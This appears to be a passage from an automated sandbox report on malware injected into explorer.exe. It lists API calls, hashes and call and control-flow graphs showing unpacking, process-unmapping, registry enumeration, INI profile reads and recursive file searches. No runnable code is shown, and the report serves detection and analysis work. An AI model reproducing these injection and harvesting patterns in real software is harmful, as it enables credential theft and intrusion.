                                                                        • Opcode Fuzzy Hash: 7f149f4fafbbaf87986fcdd5fa071cfd5fd9f51ff2967b4dfa165bb06474c4bd
                                                                        • Instruction Fuzzy Hash: B64138756083419FC714EF25C89196FB7E5AFC8304F04692DF995A7262EB30EC89CB52
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
                                                                        • lstrlenW.KERNEL32(00E56564,?,?,00E02F0C), ref: 00E01978
                                                                        • lstrcatW.KERNEL32(00000000,?,?,?,00E02F0C), ref: 00E01990
                                                                        • lstrcatW.KERNEL32(00000000,00E56564,?,?,00E02F0C), ref: 00E01994
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatlstrlen
                                                                        • String ID:
                                                                        • API String ID: 1475610065-0
                                                                        • Opcode ID: ab751103bc84f7ed8749dd40178adadbe5e37c1710d4fe91443a9104a72c82de
                                                                        • Instruction ID: 27759eb49a889e3a28ad32d4d5f7fbf26a17b0605b26ab23071f98c4c223cfec
                                                                        • Opcode Fuzzy Hash: ab751103bc84f7ed8749dd40178adadbe5e37c1710d4fe91443a9104a72c82de
                                                                        • Instruction Fuzzy Hash: 06E0656230021D1B872477AE5C94D7B769DCAD97A57450079FA04E7242E9569C0946B0
                                                                        APIs
                                                                          • Part of subcall function 00E06A81: memset.NTDLL ref: 00E06A9C
                                                                        • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 00E2F2A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _aulldivmemset
                                                                        • String ID: %llu$%llu
                                                                        • API String ID: 714058258-4283164361
                                                                        • Opcode ID: ee4c38e4c76b39b94b44e21c5d4e016b7402bbb22a50a36f49a45b2c55671094
                                                                        • Instruction ID: f6b5404c104bd68fd73bf559b1b3b2a7268300a2a28e3e946328db59bc00fe43
                                                                        • Opcode Fuzzy Hash: ee4c38e4c76b39b94b44e21c5d4e016b7402bbb22a50a36f49a45b2c55671094
                                                                        • Instruction Fuzzy Hash: B8212972644215ABC710AA64DC42F6BB7A8EF81730F055638F921B72D1DB21EC5587F1
                                                                        APIs
                                                                        • _allmul.NTDLL(?,00000000,?), ref: 00E12174
                                                                        • _allmul.NTDLL(?,?,?,00000000), ref: 00E1220E
                                                                        • _allmul.NTDLL(?,00000000,00000000,?), ref: 00E12241
                                                                        • _allmul.NTDLL(00E02E26,00000000,?,?), ref: 00E12295
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _allmul
                                                                        • String ID:
                                                                        • API String ID: 4029198491-0
                                                                        • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                        • Instruction ID: 6dd37b416836609889ac41644e24cb4e40901521ca3f01064e42ff8809e70e69
                                                                        • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                        • Instruction Fuzzy Hash: 9BA18D707087019FC714DF64C891AAEB7E6AFD8704F00682CF655A7261EB71EC95CB42
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcpymemset
                                                                        • String ID:
                                                                        • API String ID: 1297977491-0
                                                                        • Opcode ID: 4cf9d8e63f2a26de6f7da103d50284d3077c94d3ee486983232fdb735734cb1a
                                                                        • Instruction ID: 3fd34944e9179eac4b7beabee4745ad706eee28e8cb53327342a4d042658d683
                                                                        • Opcode Fuzzy Hash: 4cf9d8e63f2a26de6f7da103d50284d3077c94d3ee486983232fdb735734cb1a
                                                                        • Instruction Fuzzy Hash: AF81707160C3149FC350DF28C884AABBBE5EFC8704F15596DF8C6A7252E670E989CB91
                                                                        APIs
                                                                        • lstrlen.KERNEL32(?,?,?,?,00000000,00E02783), ref: 00E0192B
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00E02783), ref: 00E01930
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 00E01946
                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E0194A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatlstrlen
                                                                        • String ID:
                                                                        • API String ID: 1475610065-0
                                                                        • Opcode ID: afc614446ce43f9a033508d4becec1d779ff92423ab742ab01f1051048eba1cb
                                                                        • Instruction ID: 2a105e66d4f703c37d59d854132696d017fbbdc9558df8e6a5e7a8addb9a1fe9
                                                                        • Opcode Fuzzy Hash: afc614446ce43f9a033508d4becec1d779ff92423ab742ab01f1051048eba1cb
                                                                        • Instruction Fuzzy Hash: 73E09B5230031C1B473577AE5C94D7B76DDCAD57A63450175FD04E7202ED559C0546B0

                                                                        Execution Graph

                                                                        Execution Coverage:21.6%
                                                                        Dynamic/Decrypted Code Coverage:87.3%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:181
                                                                        Total number of Limit Nodes:17
                                                                        execution_graph 1139 1da1af 1140 1da1bd 1139->1140 1141 1da298 3 API calls 1140->1141 1142 1da1cf 1140->1142 1141->1142 1128 1da1f9 1129 1da228 1128->1129 1131 1da248 1128->1131 1132 1da298 1129->1132 1137 1da29d 1132->1137 1133 1da385 LoadLibraryA 1133->1137 1135 1da3e0 VirtualProtect VirtualProtect 1136 1da46e 1135->1136 1136->1136 1137->1133 1137->1135 1138 1da3d5 1137->1138 1138->1131 941 1da298 946 1da29d 941->946 942 1da385 LoadLibraryA 942->946 944 1da3e0 VirtualProtect VirtualProtect 945 1da46e 944->945 945->945 946->942 946->944 947 1da3d5 946->947 996 1d3608 1001 1d3458 StrStrIW 996->1001 999 1d3458 17 API calls 1000 1d365d 999->1000 1002 1d348f 1001->1002 1003 1d350f 1001->1003 1026 1d2774 1002->1026 1005 1d3523 RegOpenKeyExW 1003->1005 1006 1d35e4 1005->1006 1012 1d354d 1005->1012 1007 1d1860 RtlFreeHeap 1006->1007 1010 1d35f7 1007->1010 1008 1d35b5 RegEnumKeyExW 1008->1006 1008->1012 1009 1d34a8 1009->1003 1011 1d3507 1009->1011 1039 1d28a0 1009->1039 1010->999 1013 1d1860 RtlFreeHeap 1011->1013 1012->1008 1015 1d2700 RtlFreeHeap 1012->1015 1018 1d3458 14 API calls 1012->1018 1022 1d1860 RtlFreeHeap 1012->1022 1013->1003 1015->1012 1016 1d34fa 1019 1d1860 RtlFreeHeap 1016->1019 1018->1012 1019->1011 1022->1012 1025 1d1860 RtlFreeHeap 1025->1016 1027 1d2797 RegOpenKeyExW 1026->1027 1028 1d2793 1026->1028 1029 1d286b 1027->1029 1030 1d27d5 RegQueryValueExW 1027->1030 1028->1027 1031 1d288d 1029->1031 1033 1d2774 RtlFreeHeap 1029->1033 1032 1d285b RegCloseKey 1030->1032 1034 1d27fe 1030->1034 1031->1009 1032->1029 1032->1031 1033->1031 1034->1032 1035 1d281a RegQueryValueExW 1034->1035 1036 1d2844 1035->1036 1037 1d2851 1035->1037 1036->1032 1038 1d1860 RtlFreeHeap 1037->1038 1038->1036 1040 1d28b9 1039->1040 1041 1d2922 1040->1041 1042 1d1860 RtlFreeHeap 1040->1042 1041->1016 1045 1d2700 1041->1045 1044 1d28df 1042->1044 1043 1d2774 5 API calls 1043->1044 1044->1041 1044->1043 1046 1d2712 1045->1046 1047 1d1860 RtlFreeHeap 1046->1047 1048 1d271d 1047->1048 1048->1016 1049 1d3254 1048->1049 1073 1d298c 1049->1073 1052 1d343a 1052->1025 1053 1d298c GetFileAttributesW 1056 1d3295 1053->1056 1054 1d342c 1082 1d30a8 1054->1082 1056->1052 1056->1054 1077 1d2938 1056->1077 1059 1d340c 1061 1d1860 RtlFreeHeap 1059->1061 1060 1d3304 GetPrivateProfileSectionNamesW 1060->1059 1071 1d331e 1060->1071 1062 1d3414 1061->1062 1063 1d1860 RtlFreeHeap 1062->1063 1064 1d341c 1063->1064 1065 1d1860 RtlFreeHeap 1064->1065 1067 1d3424 1065->1067 1066 1d334e GetPrivateProfileStringW 1068 1d3379 GetPrivateProfileIntW 1066->1068 1066->1071 1069 1d1860 RtlFreeHeap 1067->1069 1068->1071 1069->1054 1070 1d30a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1070->1071 1071->1059 1071->1066 1071->1070 1072 1d1860 RtlFreeHeap 1071->1072 1072->1071 1074 1d2999 1073->1074 1076 1d29a9 1073->1076 1075 1d299e GetFileAttributesW 1074->1075 1074->1076 1075->1076 1076->1052 1076->1053 1078 1d2945 1077->1078 1079 1d2980 1077->1079 1078->1079 1080 1d294a CreateFileW 1078->1080 1079->1059 1079->1060 1080->1079 1081 1d2972 CloseHandle 1080->1081 1081->1079 1083 1d30cc 1082->1083 1084 1d30f1 FindFirstFileW 1083->1084 1085 1d3237 1084->1085 1095 1d3117 1084->1095 1086 1d1860 RtlFreeHeap 1085->1086 1087 1d323f 1086->1087 1088 1d1860 RtlFreeHeap 1087->1088 1089 1d3247 1088->1089 1089->1052 1090 1d2700 RtlFreeHeap 1090->1095 1091 1d3210 FindNextFileW 1092 1d3226 FindClose 1091->1092 1091->1095 1092->1085 1093 1d1860 RtlFreeHeap 1093->1091 1095->1090 1095->1091 1095->1093 1096 1d30a8 RtlFreeHeap 1095->1096 1097 1d1860 RtlFreeHeap 1095->1097 1098 1d2f7c 1095->1098 1096->1095 1097->1095 1108 1d2bc0 1098->1108 1101 1d3086 1101->1095 1103 1d307e 1104 1d1860 RtlFreeHeap 1103->1104 1104->1101 1105 1d2fb6 1105->1101 1105->1103 1106 1d2e04 RtlFreeHeap 1105->1106 1107 1d1860 RtlFreeHeap 1105->1107 1106->1105 1107->1105 1109 1d2bf3 1108->1109 1110 1d2700 RtlFreeHeap 1109->1110 1111 1d2c54 1110->1111 1112 1d2a54 RtlFreeHeap 1111->1112 1113 1d2c68 1112->1113 1114 1d2c7e 1113->1114 1115 1d1860 RtlFreeHeap 1113->1115 1116 1d1860 RtlFreeHeap 1114->1116 1115->1114 1122 1d2cb2 1116->1122 1117 1d2da3 1118 1d1860 RtlFreeHeap 1117->1118 1119 1d2dd9 1118->1119 1120 1d1860 RtlFreeHeap 1119->1120 1121 1d2de1 1120->1121 1121->1101 1124 1d2a54 1121->1124 1122->1117 1123 1d1860 RtlFreeHeap 1122->1123 1123->1117 1126 1d2a86 1124->1126 1125 1d2ad9 1125->1105 1126->1125 1127 1d1860 RtlFreeHeap 1126->1127 1127->1125 1143 1d3668 1144 1d3458 17 API calls 1143->1144 1145 1d369b 1144->1145 1146 1d3458 17 API calls 1145->1146 1147 1d36bd 1146->1147 948 1d37f4 949 1d3804 948->949 956 1d372c 949->956 952 1d387c 954 1d3817 954->952 966 1d36c8 954->966 957 1d375a 956->957 958 1d3777 RegCreateKeyExW 957->958 959 1d37bc RegCloseKey 958->959 960 1d37cd 958->960 959->960 974 1d1860 960->974 963 1d22b4 964 1d22c8 CreateStreamOnHGlobal 963->964 965 1d22d6 963->965 964->965 965->954 967 1d36cd 966->967 972 1d371e 966->972 968 1d3716 967->968 978 1d21e4 967->978 970 1d1860 RtlFreeHeap 968->970 970->972 971 1d3706 973 1d1860 RtlFreeHeap 971->973 972->952 973->968 975 1d186e 974->975 976 1d1886 975->976 977 1d1878 RtlFreeHeap 975->977 976->952 976->963 977->976 979 1d220b 978->979 984 1d1e20 979->984 982 1d1860 RtlFreeHeap 983 1d2297 982->983 983->971 994 1d1e6d 984->994 985 1d21b5 986 1d1860 RtlFreeHeap 985->986 987 1d21cb 986->987 987->982 988 1d219b 988->985 989 1d1860 RtlFreeHeap 988->989 989->985 990 1d2177 991 1d1860 RtlFreeHeap 990->991 992 1d218e 991->992 992->988 993 1d1860 RtlFreeHeap 992->993 993->988 994->985 994->988 994->990 995 1d1860 RtlFreeHeap 994->995 995->990 1148 1da1e0 1149 1da1e6 1148->1149 1150 1da298 3 API calls 1149->1150 1151 1da248 1150->1151

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_001D141D 1 Function_001D971C 2 Function_001DA298 50 Function_001DA25A 2->50 3 Function_001D2498 37 Function_001D23AC 3->37 64 Function_001D2340 3->64 4 Function_001D2514 45 Function_001D23A0 4->45 53 Function_001D2354 4->53 59 Function_001D234C 4->59 77 Function_001D23F0 4->77 89 Function_001D2360 4->89 5 Function_001D1B14 28 Function_001D1838 5->28 6 Function_001DB111 7 Function_001D2610 7->28 8 Function_001D2410 8->37 8->77 9 Function_001D1D10 9->28 71 Function_001D18F8 9->71 10 Function_001D9912 11 Function_001D9C92 12 Function_001DB00C 13 Function_001D188C 13->28 14 Function_001D1B8C 14->28 15 Function_001D298C 16 Function_001D1508 17 Function_001D2308 18 Function_001D2688 18->28 19 Function_001D3608 48 Function_001D3458 19->48 20 Function_001D1405 21 Function_001D2E04 21->14 21->28 86 Function_001D1860 21->86 22 Function_001DB181 23 Function_001D1980 24 Function_001D1000 25 Function_001D2700 25->18 25->86 26 Function_001D4082 27 Function_001D2938 29 Function_001D1938 30 Function_001D9EB4 31 Function_001D22B4 32 Function_001D9930 33 Function_001D38B0 33->28 33->33 54 Function_001D1AD4 33->54 34 Function_001D14B2 35 Function_001D372C 35->28 35->86 36 Function_001D22AC 38 Function_001D272C 39 Function_001DA1AF 39->2 40 Function_001D41A9 41 Function_001D30A8 41->18 41->25 41->38 41->41 68 Function_001D2F7C 41->68 72 Function_001D2AF8 41->72 41->86 42 Function_001D99A7 43 Function_001D47A7 44 Function_001D28A0 44->28 74 Function_001D2774 44->74 44->86 46 Function_001D1E20 46->9 46->13 46->23 46->28 58 Function_001D18D0 46->58 63 Function_001D1C40 46->63 46->71 46->86 87 Function_001D1DE0 46->87 47 Function_001D1822 48->18 48->25 48->28 48->44 48->48 52 Function_001D3254 48->52 65 Function_001D29C0 48->65 48->74 48->86 49 Function_001D9ADA 51 Function_001DA055 52->15 52->18 52->27 52->28 52->38 52->41 52->86 55 Function_001D14D4 56 Function_001D1254 57 Function_001D2A54 57->28 57->86 60 Function_001D1A4C 61 Function_001D36C8 61->5 81 Function_001D18E8 61->81 84 Function_001D21E4 61->84 61->86 62 Function_001D4048 65->18 66 Function_001D2BC0 66->7 66->18 66->25 66->28 66->29 66->38 66->57 66->86 67 Function_001D9FC2 68->21 68->57 68->66 73 Function_001D2EF8 68->73 68->86 69 Function_001DA1F9 69->2 70 Function_001D14F9 72->28 73->7 74->28 74->74 74->86 75 Function_001D37F4 75->17 75->31 75->35 75->36 75->53 75->61 78 Function_001D2570 75->78 80 Function_001D2B6C 75->80 82 Function_001D22E8 75->82 76 Function_001D1576 77->37 78->28 78->45 78->53 79 Function_001D156C 80->3 80->4 83 Function_001D3668 83->48 84->28 84->46 84->86 85 Function_001DA1E0 85->2 86->54 87->60 88 Function_001D1560

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 184 1d30a8-1d30e3 call 1d2688 call 1d272c 189 1d30ec-1d3111 call 1d2688 FindFirstFileW 184->189 190 1d30e5-1d30e6 184->190 193 1d3237-1d3252 call 1d1860 * 2 189->193 194 1d3117-1d3118 189->194 190->189 196 1d311f-1d3124 194->196 198 1d31ad-1d31df call 1d2688 call 1d2700 196->198 199 1d312a-1d313e 196->199 214 1d3208-1d320b call 1d1860 198->214 215 1d31e1-1d31eb call 1d2af8 198->215 206 1d3144-1d3158 199->206 207 1d3210-1d3220 FindNextFileW 199->207 206->207 211 1d315e-1d316b call 1d272c 206->211 207->196 209 1d3226-1d3230 FindClose 207->209 209->193 219 1d316d-1d3174 211->219 220 1d3176 211->220 214->207 215->214 223 1d31ed-1d3203 call 1d2f7c 215->223 222 1d3178-1d31a8 call 1d2688 call 1d2700 call 1d30a8 call 1d1860 219->222 220->222 222->198 223->214
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 3541575487-0
                                                                        • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                        • Instruction ID: e0725c67f65c2af896ee9c226cd1d219abb0b36e30746fbc7e31b979eb80c14b
                                                                        • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                        • Instruction Fuzzy Hash: 5D417330718B4D5FDB54EB3894597AA73D2FBE8340F444A2AE45AC3391EF78D9048782

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 239 1d38b0-1d3907 call 1d1ad4 call 1d1838 NtUnmapViewOfSection call 1d388c 248 1d3909-1d390c call 1d38b0 239->248 249 1d3911-1d391a 239->249 248->249
                                                                        APIs
                                                                        • NtUnmapViewOfSection.NTDLL ref: 001D38F2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: SectionUnmapView
                                                                        • String ID:
                                                                        • API String ID: 498011366-0
                                                                        • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                        • Instruction ID: d7afa70458a50b82f9b773229a29cc8fc1395a10b81e4b2ece8b65aa48b439dc
                                                                        • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                        • Instruction Fuzzy Hash: 9AF0A030F11A082BEA6C77BD685D3282280EB68310F90062BB525C33E2DE398A458302

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE ref: 001D27C7
                                                                        • RegQueryValueExW.KERNELBASE ref: 001D27F4
                                                                        • RegQueryValueExW.KERNELBASE ref: 001D283A
                                                                        • RegCloseKey.KERNELBASE ref: 001D2860
                                                                          • Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseFreeHeapOpen
                                                                        • String ID:
                                                                        • API String ID: 1641618270-0
                                                                        • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                        • Instruction ID: 4e7e998e761750d41a5a54e5edd1ea72fde0c9c61537ead481fb8b03583dcee9
                                                                        • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                        • Instruction Fuzzy Hash: 7A316E30208B488FE769DB28D45877ABBD0FBB8355F54062FE49AC3264DF34D8469742

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 22 1d372c-1d37ba call 1d1838 RegCreateKeyExW 26 1d37bc-1d37cb RegCloseKey 22->26 27 1d37d6-1d37f0 call 1d1860 22->27 26->27 28 1d37cd-1d37d3 26->28 28->27
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreate
                                                                        • String ID: ?
                                                                        • API String ID: 2932200918-1684325040
                                                                        • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                        • Instruction ID: b182950bdd00a600025b031e3234daaaa3e588dabaa9d198138e844f566c4a8f
                                                                        • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                        • Instruction Fuzzy Hash: 18116070618B488FD751DF69D48866AB7E1FB98345F50062FE48AC3360DF389985CB82

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 31 1da298-1da29b 32 1da2a5-1da2a9 31->32 33 1da2ab-1da2b3 32->33 34 1da2b5 32->34 33->34 35 1da29d-1da2a3 34->35 36 1da2b7 34->36 35->32 37 1da2ba-1da2c1 36->37 39 1da2cd 37->39 40 1da2c3-1da2cb 37->40 39->37 41 1da2cf-1da2d2 39->41 40->39 42 1da2d4-1da2e2 41->42 43 1da2e7-1da2f4 41->43 44 1da31e-1da339 42->44 45 1da2e4-1da2e5 42->45 53 1da30e-1da31c call 1da25a 43->53 54 1da2f6-1da2f8 43->54 47 1da36a-1da36d 44->47 45->43 48 1da36f-1da370 47->48 49 1da372-1da379 47->49 51 1da351-1da355 48->51 52 1da37f-1da383 49->52 55 1da33b-1da33e 51->55 56 1da357-1da35a 51->56 57 1da385-1da39e LoadLibraryA 52->57 58 1da3e0-1da3e9 52->58 53->32 59 1da2fb-1da302 54->59 55->49 64 1da340 55->64 56->49 60 1da35c-1da360 56->60 63 1da39f-1da3a6 57->63 61 1da3ec-1da3f5 58->61 80 1da30c 59->80 81 1da304-1da30a 59->81 65 1da341-1da345 60->65 66 1da362-1da369 60->66 67 1da41a-1da46a VirtualProtect * 2 61->67 68 1da3f7-1da3f9 61->68 63->52 70 1da3a8 63->70 64->65 65->51 71 1da347-1da349 65->71 66->47 75 1da46e-1da473 67->75 73 1da40c-1da418 68->73 74 1da3fb-1da40a 68->74 76 1da3aa-1da3b2 70->76 77 1da3b4-1da3bc 70->77 71->51 79 1da34b-1da34f 71->79 73->74 74->61 75->75 82 1da475-1da484 75->82 78 1da3be-1da3ca 76->78 77->78 85 1da3cc-1da3d3 78->85 86 1da3d5-1da3df 78->86 79->51 79->56 80->53 80->59 81->80 85->63
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE ref: 001DA397
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 001DA441
                                                                        • VirtualProtect.KERNELBASE ref: 001DA45F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2874598553.00000000001D9000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1d9000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 895956442-0
                                                                        • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                        • Instruction ID: 5768982b0f36e44076531008775d5e4297576efe290e56356b008267c4342c97
                                                                        • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                        • Instruction Fuzzy Hash: 7351463275891D5BCB28EA7C98942F5B7D2FF59321B98062BC49AC3384D759D8468383

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 87 1d3254-1d3287 call 1d298c 90 1d328d-1d3297 call 1d298c 87->90 91 1d343a-1d3456 87->91 90->91 94 1d329d-1d32aa call 1d272c 90->94 97 1d32ac-1d32b3 94->97 98 1d32b5 94->98 99 1d32b7-1d32c2 call 1d2688 97->99 98->99 102 1d342c-1d3435 call 1d30a8 99->102 103 1d32c8-1d32fe call 1d2688 call 1d1838 * 2 call 1d2938 99->103 102->91 113 1d340c-1d3427 call 1d1860 * 4 103->113 114 1d3304-1d3318 GetPrivateProfileSectionNamesW 103->114 113->102 114->113 116 1d331e-1d3326 114->116 116->113 118 1d332c-1d332f 116->118 118->113 120 1d3335-1d3348 118->120 124 1d334e-1d3377 GetPrivateProfileStringW 120->124 125 1d33f0-1d3406 120->125 124->125 127 1d3379-1d3398 GetPrivateProfileIntW 124->127 125->113 125->118 130 1d339a-1d33ad call 1d2688 127->130 131 1d33e5-1d33eb call 1d30a8 127->131 135 1d33af-1d33b3 130->135 136 1d33c6-1d33e3 call 1d30a8 call 1d1860 130->136 131->125 137 1d33bd-1d33c4 135->137 138 1d33b5-1d33ba 135->138 136->125 137->135 137->136 138->137
                                                                        APIs
                                                                          • Part of subcall function 001D298C: GetFileAttributesW.KERNELBASE ref: 001D299E
                                                                        • GetPrivateProfileSectionNamesW.KERNEL32 ref: 001D330F
                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 001D336F
                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 001D338C
                                                                          • Part of subcall function 001D30A8: FindFirstFileW.KERNELBASE ref: 001D3104
                                                                          • Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                        • String ID:
                                                                        • API String ID: 970345848-0
                                                                        • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                        • Instruction ID: e98378272e2651de6e2753318e27cd1a63479545120386f18f59f783f6cf2a44
                                                                        • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                        • Instruction Fuzzy Hash: AA51B430718F195BEB59BB2C985667972D2FBA8300B44056FE41AC3396EF78DD428387

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • StrStrIW.KERNELBASE ref: 001D347E
                                                                        • RegOpenKeyExW.KERNELBASE ref: 001D353F
                                                                        • RegEnumKeyExW.KERNELBASE ref: 001D35D6
                                                                          • Part of subcall function 001D2774: RegOpenKeyExW.KERNELBASE ref: 001D27C7
                                                                          • Part of subcall function 001D2774: RegQueryValueExW.KERNELBASE ref: 001D27F4
                                                                          • Part of subcall function 001D2774: RegQueryValueExW.KERNELBASE ref: 001D283A
                                                                          • Part of subcall function 001D2774: RegCloseKey.KERNELBASE ref: 001D2860
                                                                          • Part of subcall function 001D3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 001D330F
                                                                          • Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                        • String ID:
                                                                        • API String ID: 1841478724-0
                                                                        • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                        • Instruction ID: 0e33bd0f8b213b7608e1a87d3074433987aa4d794f61a9af5e539c9510e7d4fa
                                                                        • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                        • Instruction Fuzzy Hash: A7414830718B484FDB98EF6D949972AB6E2FBA8341F00496FA55EC3361DF34D9448B42

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 232 1d2938-1d2943 233 1d2945-1d2948 232->233 234 1d2984 232->234 233->234 235 1d294a-1d2970 CreateFileW 233->235 236 1d2986-1d298b 234->236 237 1d2980-1d2982 235->237 238 1d2972-1d297a CloseHandle 235->238 237->236 238->237
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateFileHandle
                                                                        • String ID:
                                                                        • API String ID: 3498533004-0
